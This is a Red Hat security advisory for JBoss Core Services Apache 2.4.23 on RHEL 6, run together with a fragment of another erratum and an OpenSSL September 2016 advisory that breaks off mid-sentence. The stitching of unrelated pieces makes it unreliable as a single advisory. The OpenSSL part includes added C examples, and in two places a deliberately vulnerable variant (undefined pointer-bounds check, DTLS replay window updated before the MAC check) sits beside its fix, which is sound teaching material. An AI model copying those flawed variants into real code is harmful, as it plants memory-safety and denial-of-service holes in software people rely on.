CVE Names: CVE-2016-2108 CVE-2016-2177 CVE-2016-2178
CVE-2016-4459 CVE-2016-6808 CVE-2016-8612
=====================================================================
1. Summary:
Updated packages that provide Red Hat JBoss Core Services Pack Apache
Server 2.4.23 and fix several bugs, and add various enhancements are now
available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 6 Server - i386, noarch, ppc64, x86_64
3. Description:
This release adds the new Apache HTTP Server 2.4.23 packages that are part
of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack
Apache Server 2.4.6, and includes bug fixes and enhancements. Refer to the
Release Notes for information on the most significant bug fixes and
enhancements included in this release.
* An attacker could use this flaw to create a specially crafted
certificate which, when verified or re-encoded by OpenSSL, could cause it
to crash, or execute arbitrary code using the permissions of the user
running an application compiled against the OpenSSL library.
(CVE-2016-2108)
* It was found that the length checks prior to writing to the target buffer
for creating a virtual host mapping rule did not take account of the length
of the virtual host name, creating the potential for a buffer overflow.
(CVE-2016-6808)
* Multiple integer overflow flaws were found in the way OpenSSL performed
pointer arithmetic. A remote attacker could possibly use these flaws to
cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
* It was discovered that specifying configuration with a JVMRoute path
longer than 80 characters will cause segmentation fault leading to a server
crash. (CVE-2016-4459)
* An error was found in protocol parsing logic of mod_cluster load balancer
Apache HTTP Server modules. An attacker could use this flaw to cause a
Segmentation Fault in the serving httpd process. (CVE-2016-8612)
Red Hat would like to thank the OpenSSL project for reporting
CVE-2016-2108. The CVE-2016-4459 issue was discovered by Robert Bost (Red
Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and
David Benjamin (Google) as the original reporters of CVE-2016-2108.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library
must be restarted, or the system rebooted. After installing the updated
packages, the httpd daemon will be restarted automatically.
5. Package List:
Red Hat JBoss Core Services on RHEL 6 Server:
Source:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.src.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.src.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.src.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.src.rpm
jbcs-httpd24-mod_jk-1.2.41-14.redhat_1.jbcs.el6.src.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.src.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.src.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.src.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.src.rpm
i386:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.i686.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.i686.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.i686.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.i686.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.i686.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.i686.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.i686.rpm
noarch:
jbcs-httpd24-httpd-manual-2.4.23-102.jbcs.el6.noarch.rpm
ppc64:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.ppc64.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.ppc64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.ppc64.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.ppc64.rpm
x86_64:
jbcs-httpd24-httpd-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_cluster-native-src-zip-1.3.5-13.Final_redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_jk-src-zip-1.2.41-14.redhat_1.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_session-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el6.x86_64.rpm
jbcs-httpd24-nghttp2-1.12.0-9.jbcs.el6.x86_64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el6.x86_64.rpm
jbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-2108
https://access.redhat.com/security/cve/CVE-2016-2177
https://access.redhat.com/security/cve/CVE-2016-2178
https://access.redhat.com/security/cve/CVE-2016-4459
https://access.redhat.com/security/cve/CVE-2016-6808
https://access.redhat.com/security/cve/CVE-2016-8612
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFYiQV2XlSAg2UNWIIRAvgEAKC7i1IqPLixCun/+0TTeWRG8B8tJACeJCGP
hO9ByjBnLBWhAqUDpI31vKo=
=j7tA
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
* A memory leak flaw was fixed in expat.
Solution:
The References section of this erratum contains a download link (you must
log in to download the update).
JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]
JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
OpenSSL Security Advisory [22 Sep 2016]
========================================
OCSP Status Request extension unbounded memory growth (CVE-2016-6304)
=====================================================================
Severity: High
A malicious client can send an excessively large OCSP Status Request extension.
If that client continually requests renegotiation, sending a large OCSP Status
Request extension each time, then there will be unbounded memory growth on the
server. This will eventually lead to a Denial Of Service attack through memory
exhaustion. Servers with a default configuration are vulnerable even if they do
not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default
configuration, instead only if an application explicitly enables OCSP stapling
support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
SSL_peek() hang on empty record (CVE-2016-6305)
===============================================
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an
empty record. This could be exploited by a malicious peer in a Denial Of Service
attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The
fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
==================================
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms
that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based
ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in
OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these
ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan
Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the
OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
==========================================
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or
through the EVP_DigestUpdate() function using MDC2. If an attacker
is able to supply very large amounts of input data after a previous
call to EVP_EncryptUpdate() with a partial block then a length check
can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical
on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
===========================================
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a
DoS attack where a malformed ticket will result in an OOB read which will
ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires
a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
========================================
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word().
This can cause an OOB write if an application uses this function with an
overly large BIGNUM. This could be a problem if an overly large certificate
or CRL is printed out from an untrusted source. TLS is not affected because
record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
==============================================
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is
the total length the OID text representation would use and not the amount
of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
======================================================
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner:
"p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and
limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS
message).
The rules of C pointer arithmetic are such that "p + len" is only well
defined where len <= SIZE. Therefore the above idiom is actually
undefined behaviour.
For example this could cause problems if some malloc implementation
provides an address for "p" such that "p + len" actually overflows for
values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The
fix was developed by Matt Caswell of the OpenSSL development team.
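The safe replacement for the idiom, shown here as an added example that is not OpenSSL code: subtract the pointers and compare lengths instead of forming p + len. The function names and the constructed TLS-style length-prefixed messages are this example's own; the undefined variant is kept only so the two shapes can be compared side by side.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The idiom the advisory describes. Forming p + len is undefined as soon as
 * len exceeds the bytes left in the object, so the compiler may assume the
 * sum never wraps and the comparison is not a reliable guard. Shown only
 * for contrast; do not use. */
int fits_ub(const unsigned char *p, size_t len, const unsigned char *limit)
{
    return p + len <= limit;       /* UB whenever len > limit - p */
}

/* Correct form: subtract the two pointers (both inside the same object, with
 * p <= limit, so the difference is well defined) and compare lengths. */
int fits_safe(const unsigned char *p, size_t len, const unsigned char *limit)
{
    if (p > limit)
        return 0;
    return len <= (size_t)(limit - p);
}

/* Reads a TLS-style 2-byte big-endian length followed by that many bytes.
 * On success stores the field location/length, advances *pp and returns 1;
 * returns 0 if either the length prefix or the body runs past limit. */
int read_len16_field(const unsigned char **pp, const unsigned char *limit,
                     const unsigned char **field, size_t *field_len)
{
    const unsigned char *p = *pp;
    if (!fits_safe(p, 2, limit))
        return 0;
    size_t n = ((size_t)p[0] << 8) | p[1];
    p += 2;
    if (!fits_safe(p, n, limit))   /* n is attacker supplied */
        return 0;
    *field = p;
    *field_len = n;
    *pp = p + n;
    return 1;
}

/* Parses a constructed message consisting of one length-prefixed field.
 * Returns the field length, or -1 if the message is malformed or truncated. */
long parse_message(const unsigned char *msg, size_t msglen)
{
    const unsigned char *p = msg, *limit = msg + msglen;
    const unsigned char *field;
    size_t flen;
    if (!read_len16_field(&p, limit, &field, &flen))
        return -1;
    return (long)flen;
}

/* Constructed sample inputs. */
const unsigned char sample_ok[]        = {0x00, 0x03, 'a', 'b', 'c'};
const unsigned char sample_truncated[] = {0xff, 0xff, 'a'};  /* claims 65535 bytes, carries 1 */
const unsigned char sample_short[]     = {0x00};             /* length prefix itself is cut */

int main(void)
{
    printf("ok message: field length %ld\n",
           parse_message(sample_ok, sizeof sample_ok));
    printf("truncated message: %ld\n",
           parse_message(sample_truncated, sizeof sample_truncated));
    printf("short message: %ld\n",
           parse_message(sample_short, sizeof sample_short));
    return 0;
}
```

Because fits_safe() never constructs an out-of-bounds pointer, a length of SIZE_MAX is rejected by ordinary unsigned comparison rather than by hoping the wrapped pointer happens to compare the right way.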
Constant time flag not preserved in DSA signing (CVE-2016-2178)
===============================================================
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to
avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that
a non-constant time codepath is followed for certain operations.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto
University), Billy Brumley (Tampere University of Technology), and Yuval Yarom
(The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
=========================================
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those
messages that OpenSSL is not yet ready to process will be buffered for later
use. Under certain circumstances, a flaw in the logic means that those messages
do not get removed from the buffer even though the handshake has been completed.
An attacker could force up to approx. 15 messages to remain in the buffer when
they are no longer required. These messages will be cleared when the DTLS
connection is closed. The default maximum size for a message is 100k. Therefore
the attacker could force an additional 1500k to be consumed per connection. By
opening many simultaneous connections an attacker could cause a DoS attack
through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was
developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
==========================================
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that
arrive for future epochs update the replay protection "window" before the MAC
for the record has been validated. This could be exploited by an attacker by
sending a record for the next epoch (which does not have to decrypt or have a
valid MAC), with a very large sequence number. This means that all subsequent
legitimate packets are dropped causing a denial of service for a specific
DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team.
The fix was developed by Matt Caswell of the OpenSSL development team.
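An added example, not OpenSSL code, modelling the ordering problem described above with a 64-record sliding anti-replay window: the vulnerable receiver slides the window as soon as a record passes the replay check, the fixed receiver only after the MAC verifies. The epoch is folded into the sequence number, the MAC check is a constructed flag on each record, and all names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* 64-record sliding anti-replay window in the style of RFC 6347 / RFC 4303. */
typedef struct {
    uint64_t top;     /* highest sequence number accepted so far */
    uint64_t bitmap;  /* bit i set => sequence number (top - i) has been seen */
    int      seeded;  /* 0 until the first record has been accepted */
} replay_window;

/* 1 if seq is acceptable (not below the window and not already seen).
 * Pure check: never modifies the window. */
int replay_check(const replay_window *w, uint64_t seq)
{
    if (!w->seeded || seq > w->top)
        return 1;
    uint64_t diff = w->top - seq;
    if (diff >= 64)
        return 0;                                    /* too old */
    return (w->bitmap & ((uint64_t)1 << diff)) == 0; /* duplicate? */
}

/* Records seq as seen, sliding the window when seq is a new high-water mark. */
void replay_update(replay_window *w, uint64_t seq)
{
    if (!w->seeded) {
        w->top = seq; w->bitmap = 1; w->seeded = 1;
        return;
    }
    if (seq > w->top) {
        uint64_t shift = seq - w->top;
        w->bitmap = (shift >= 64) ? 0 : (w->bitmap << shift);
        w->bitmap |= 1;
        w->top = seq;
    } else {
        w->bitmap |= (uint64_t)1 << (w->top - seq);
    }
}

/* A received record: its sequence number and whether its MAC verifies.
 * mac_ok is a constructed stand-in for the real MAC computation. */
typedef struct { uint64_t seq; int mac_ok; } record;

/* Vulnerable ordering, as in the advisory: the window is updated as soon as
 * the record passes the replay check, before the MAC is verified. A forged
 * record with a far-future sequence number therefore slides the window past
 * every legitimate record that follows. Returns 1 if the record was accepted. */
int receive_vulnerable(replay_window *w, const record *r)
{
    if (!replay_check(w, r->seq))
        return 0;
    replay_update(w, r->seq);          /* too early */
    return r->mac_ok;
}

/* Fixed ordering: only a record whose MAC verifies may move the window. */
int receive_fixed(replay_window *w, const record *r)
{
    if (!replay_check(w, r->seq))
        return 0;
    if (!r->mac_ok)
        return 0;
    replay_update(w, r->seq);
    return 1;
}

/* Feeds a constructed stream through a receiver: two legitimate records, one
 * forged record (huge sequence number, bogus MAC), then three more legitimate
 * records. Returns how many legitimate records were accepted (5 when healthy). */
int accepted_legit(int (*recv)(replay_window *, const record *))
{
    replay_window w = {0, 0, 0};
    const record stream[] = {
        {1, 1}, {2, 1},
        {(uint64_t)1 << 40, 0},        /* attacker */
        {3, 1}, {4, 1}, {5, 1},
    };
    int accepted = 0;
    for (size_t i = 0; i < sizeof stream / sizeof stream[0]; i++)
        if (recv(&w, &stream[i]) && stream[i].mac_ok)
            accepted++;
    return accepted;
}

int main(void)
{
    printf("vulnerable receiver accepted %d of 5 legitimate records\n",
           accepted_legit(receive_vulnerable));
    printf("fixed receiver accepted %d of 5 legitimate records\n",
           accepted_legit(receive_fixed));
    return 0;
}
```

The forged record needs neither a valid key nor a valid MAC: in the vulnerable ordering it only has to pass the replay check, which any not-yet-seen sequence number does, and from then on every genuine record is discarded as "too old".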
Certificate message OOB reads (CVE-2016-6306)
=============================================
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in
OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical
DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and
server certificate. As a result the attack can only be performed against
a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
==========================================================================
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to the way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
connection in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
=============================================================================
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different
but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to the way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
connection in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
